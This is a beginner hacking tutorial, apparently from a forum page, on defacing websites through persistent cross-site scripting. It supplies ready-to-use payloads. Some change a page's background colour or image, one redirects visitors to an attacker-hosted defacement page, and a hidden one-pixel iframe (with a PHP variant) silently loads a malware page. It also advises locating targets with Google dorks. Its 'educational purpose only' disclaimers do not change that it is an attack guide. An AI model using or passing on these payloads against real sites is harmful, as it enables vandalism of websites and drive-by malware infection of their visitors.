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- đź”°How to deface website with Cross Site Scripting.đź”°
- ❌ Hacking is illegal, so taking the risk is entirely up to you, exploithacker admin not take no responsibility. ❌
- Today i am gonna teach you how to deface the sites which has the XSS vulnerability .
- Defacing is one of the most common thing when the hacker found the vulnerability in website.
- Defacing is changing the content the website to Hacker content.
- Most of time, attacker use this technique to inform about the vulnerability to Admin.
- But it's bad idea..!
- i have some easiest methods to deface the Xss vuln sites .. i will be teaching u one by one .
- 1 - Script for changing the background Color of a website:
- <script>document.body.bgColor="red";</script>
- use this in your target website as
- Code:
- 2 - Script for chaning the background image of a website:
- Code:
- <script>document.body.background="http://your_image.jpg/";</script>
- 3 - Defacement Page with Pastehtml:
- First of all upload some defacement page(html) to and get the link.
- When you find a XSS vulnerable site, then insert the script as :
- Code:
- <script>window.location="";</script>
- This script will redirect the page to your pastehtml defacement page.
- Note: You can deface only persistent XSS vulnerable sites.
- 4 - Defacing with iframe Injection
- What is an IFrame Injection?
- Using IFrame tag, The Attackers injects the malware contain website(links)
- using Cross site Scripting in popular websites.
- So if the usual visitors of that popular sites opens the website,
- it will redirect to malware contain website.
- Malware will be loaded to your computer, now you are infected .
- What an attacker can do with Iframe Injection?
- Using Iframe Injection, an attacker can inject advertisements inside any other websites,
- insert malware infected site links, redirect to malware infected sites and more.
- Iframe Injection Tutorial:
- 1.First of all attacker will find the Vulnerable websites using google dorks.
- 2. They test the vulnerability by inserting some iframe tag using the url.
- 3. then insert the Malicious Iframe code inside the webpage.
- For Example:
- he can insert this code using the url:
- Code:
- <iframe src=”http://malwarewebpages/web.html” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>
- For php webpages:
- Code:
- echo “<iframe src=\”http://malwarewebpages/web.html\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;
- I have just given some easy method only to deface the XSS affected page ..
- It wil be beginner friendly .. Still there are more methods to deface it..
- IMP NOTE : : Never implement this technique. I am just explaining it for educational purpose only.WE ARE Not RESPONSIBLE FOR ANY MISUSE.
- ❌Hacking is illegal, so taking the risk is entirely up to you, exploithacker admin take no responsibility.❌
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